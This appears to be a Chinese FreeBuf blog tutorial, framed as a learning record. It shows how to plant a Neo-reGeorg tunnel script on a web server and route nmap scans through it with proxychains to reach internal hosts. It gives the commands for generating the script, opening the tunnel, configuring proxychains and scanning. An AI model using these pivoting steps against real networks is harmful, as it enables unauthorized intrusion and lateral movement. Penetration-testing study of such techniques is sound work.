reGeorg+proxychains达到内网横向效果
2023-2-3 11:34:30 Author: www.freebuf.com(查看原文) 阅读量:11 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

本文仅用于记录自身学习过程。

概述

reGeorg该工具是基于socks5而且支持的脚本很多,例如aspx|ashx|jsp|jspx|php等等。可以说是内网穿透神器,它的优势是做了加密处理,避免特征检测,生成的脚本也免杀!
主要是把内网服务器的端口通过http/https隧道转发到本机,形成一个回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。

proxychains可以让命令通过指定的proxy访问网络。

工作原理

通过reGeorg工具建立隧道,在结合proxychains利用该隧道达到内网穿透的效果。

环境介绍

1645772119_62187d57488b51a0da9b4.png!small

准备工具

reGeorg:https://github.com/L-codes/Neo-reGeorg

Proxychains:https://github.com/rofl0r/proxychains-ng

安装使用

reGeorg:

1.python3 neoreg.py generate -k 123456

生成脚本、 -k 输入自定义密码

1645772224_62187dc022f5a784ef29c.png!small

2.python3 neoreg.py -k 123456 -u http://192.168.86.128/webug/tunnel.php-p 8888

打通隧道默认是1080 -p指定端口

1645772236_62187dccba195d3fd4772.png!small

3.由于他是基于socks5,只需给浏览器配置socks5代理,就可访问内网。

1645772246_62187dd69129267c792b7.png!small

1645772252_62187ddcba4d6332b462a.png!small

Proxychains:

1.拉取文件安装

git clone https://github.com/rofl0r/proxychains-ng
cd proxychains-ng
./configure
make
make install
cp ./src/proxychains.conf /etc/proxychains.conf
cd .. && rm -rf proxychains-ng

2.配置代理

vim /etc/proxychains.conf

注:

将proxychains.conf文件中的dynamic_chain前面的注释符取消。

默认情况下,执行proxyresolv命令,可能看到该命令没找到错误信息。因为proxyresolv保存在/usr/lib/proxychains3/目录中,而不能被执行。proxyresolv会被proxychains调用,所以将这两个文件放在一个目录中。

cp /usr/lib/proxychains3/proxyresolv /usr/bin/

1645772266_62187dea24379524c667e.png!small

3.通过Proxychains挂载nmap进行扫描

此时我们扫描的数据包是先发到win7即我们的跳板机上,然后跳板机进行转发,以跳板机的名义去攻击内网其他的机器。

proxychains nmap -sT -Pn -p80 192.168.30.131645772274_62187df236d175887314c.png!small


文章来源: https://www.freebuf.com/articles/web/323240.html
如有侵权请联系:admin#unsafe.sh